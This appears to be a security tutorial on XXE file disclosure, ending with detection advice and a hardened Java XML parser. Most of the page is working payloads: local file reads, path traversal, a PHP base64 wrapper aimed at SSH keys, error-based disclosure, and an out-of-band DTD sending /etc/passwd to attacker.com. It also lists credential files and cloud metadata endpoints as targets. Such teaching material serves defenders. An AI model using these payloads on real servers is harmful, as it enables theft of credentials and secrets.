File Disclosure via XXE
Using XXE vulnerabilities to read arbitrary files from the server's filesystem, including sensitive configuration files, credentials, and source code.
Overview
File disclosure is the most common and impactful XXE exploitation technique. By defining external entities that reference local files using the file:// URI scheme, attackers can force XML parsers to read and disclose sensitive files from the server's filesystem.
Impact:
- Read application source code (credentials, API keys)
- Access configuration files (database passwords, secrets)
- Retrieve system files (/etc/passwd, /etc/shadow)
- Read deployment keys (SSH keys, certificates)
- Access application logs (session tokens, user data)
- Read cloud metadata (AWS credentials via 169.254.169.254)
Common Target Files: Linux: /etc/passwd, /etc/shadow, ~/.ssh/id_rsa, /proc/self/environ Windows: C:\windows\win.ini, C:\boot.ini, web.config, appsettings.json Application: .env, config.php, application.properties, database.yml
Basic File Disclosure Payload
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE root [
3 <!ENTITY xxe SYSTEM "file:///etc/passwd">
4]>
5<root>
6 <data>&xxe;</data>
7</root>Windows File Disclosure
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE root [
3 <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
4]>
5<root>
6 <data>&xxe;</data>
7</root>
8
9<!-- Alternative Windows paths -->
10<!-- file:///c:/boot.ini -->
11<!-- file:///c:/windows/system32/drivers/etc/hosts -->
12<!-- file:///c:/inetpub/wwwroot/web.config -->Path Traversal Techniques
When the application restricts file paths or runs from a specific directory, use path traversal:
Relative Path Traversal:
- file://../../etc/passwd
- file://../../../windows/win.ini
- file://../../../../var/www/html/config.php
Absolute Paths: Always try absolute paths first as they're more reliable:
- Linux: file:///etc/passwd (three slashes)
- Windows: file:///c:/windows/win.ini or file://c:\windows\win.ini
UNC Paths (Windows): On Windows, UNC paths may work:
- file://\\server\share\file.txt
- Can potentially access network shares
Blind File Disclosure (Out-of-Band)
1<!-- Initial XML payload -->
2<?xml version="1.0" encoding="UTF-8"?>
3<!DOCTYPE root [
4 <!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">
5 %remote;
6]>
7<root/>
8
9<!-- xxe.dtd on attacker server -->
10<!ENTITY % file SYSTEM "file:///etc/passwd">
11<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/log?data=%file;'>">
12%eval;
13%exfil;
14
15<!-- Server receives HTTP request with file content:
16GET /log?data=root:x:0:0:root:/root:/bin/bash... -->PHP Wrapper for Binary Files
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE root [
3 <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
4]>
5<root>
6 <data>&xxe;</data>
7</root>
8
9<!-- Returns base64-encoded file content:
10cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaA...
11
12Decode with: echo "<base64>" | base64 -d -->
13
14<!-- Useful for binary files: -->
15<!-- php://filter/convert.base64-encode/resource=/var/www/html/image.png -->
16<!-- php://filter/convert.base64-encode/resource=/home/user/.ssh/id_rsa -->Special Files and Locations
Linux Targets:
/etc/passwd - User account information /etc/shadow - Hashed passwords (requires root) /proc/self/environ - Environment variables (may contain secrets) /proc/self/cmdline - Command line arguments /proc/net/tcp - Network connections ~/.bash_history - Command history ~/.ssh/id_rsa - SSH private key ~/.aws/credentials - AWS credentials
Windows Targets:
C:\windows\win.ini - System configuration C:\boot.ini - Boot configuration C:\windows\system32\drivers\etc\hosts - DNS mappings C:\inetpub\wwwroot\web.config - IIS configuration
Application Files:
.env - Environment variables (Laravel, Node.js) config/database.yml - Rails database config appsettings.json - .NET Core configuration application.properties - Spring Boot config wp-config.php - WordPress database credentials
Cloud Metadata:
AWS: http://169.254.169.254/latest/meta-data/ Google: http://metadata.google.internal/computeMetadata/v1/ Azure: http://169.254.169.254/metadata/instance
Error-Based File Disclosure
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE root [
3 <!ENTITY % file SYSTEM "file:///etc/passwd">
4 <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
5 %eval;
6 %error;
7]>
8<root/>Error-Based Technique Explanation
Error-based file disclosure works when:
- Application doesn't display entity expansion output
- Error messages are returned to user
- File content appears in error message
The technique:
- Read target file into %file entity
- Reference %file in a path that will cause error
- Parser tries to access invalid path containing file content
- Error message includes the attempted path (with file content)
- Attacker sees file content in error message
Example error: "java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash (No such file or directory)"
The file content appears in the error path!
File Disclosure Limitations
XML Special Characters: Files containing XML special characters may break parsing:
- < > & " ' cause XML parse errors
- Binary files often contain these characters
- Solution: Use PHP wrappers (base64 encoding) or OOB exfiltration
File Size:
- Very large files may cause parser timeout/memory errors
- Some parsers limit entity expansion size
- Target specific configuration files (usually small)
File Permissions:
- Can only read files accessible to web server user
- Linux: typically www-data, apache, nginx user
- Windows: typically IIS AppPool identity
- Cannot read root-only files unless app runs as root (bad practice)
File Encoding:
- Non-UTF-8 files may cause encoding errors
- Use base64 encoding for binary files
- Some parsers reject invalid UTF-8 sequences
Detection and Mitigation
Detection Indicators:
-
Code Review: • XML parsers without XXE protections • file:// URI scheme in entity definitions • Display of parsed XML content to users
-
Runtime Detection: • Unexpected file access by web server process • File read operations during XML parsing • Access to sensitive files from web application
-
Log Monitoring: • File access attempts in application logs • Parse errors referencing system files • Unusual file I/O patterns
Mitigation:
- Disable External Entities (Primary defense)
- Disable DTD Processing (Strongest protection)
- Input Validation (Reject DOCTYPE)
- Least Privilege (Limit file access permissions)
- Network Segmentation (Prevent outbound connections)
- File Access Controls (Use chroot, containers)
- Monitoring (Alert on sensitive file access)
Secure Parser Configuration
1import javax.xml.parsers.DocumentBuilderFactory;
2import javax.xml.parsers.DocumentBuilder;
3import org.w3c.dom.Document;
4
5public class SecureXMLParser {
6 public Document parseXML(String xmlData) throws Exception {
7 DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
8
9 // STRONGEST: Completely disable DOCTYPE (prevents all XXE)
10 factory.setFeature(
11 "http://apache.org/xml/features/disallow-doctype-decl",
12 true
13 );
14
15 // If DOCTYPE needed, disable external entities
16 factory.setFeature(
17 "http://xml.org/sax/features/external-general-entities",
18 false
19 );
20 factory.setFeature(
21 "http://xml.org/sax/features/external-parameter-entities",
22 false
23 );
24 factory.setFeature(
25 "http://apache.org/xml/features/nonvalidating/load-external-dtd",
26 false
27 );
28
29 factory.setXIncludeAware(false);
30 factory.setExpandEntityReferences(false);
31
32 DocumentBuilder builder = factory.newDocumentBuilder();
33 return builder.parse(new ByteArrayInputStream(xmlData.getBytes()));
34 }
35}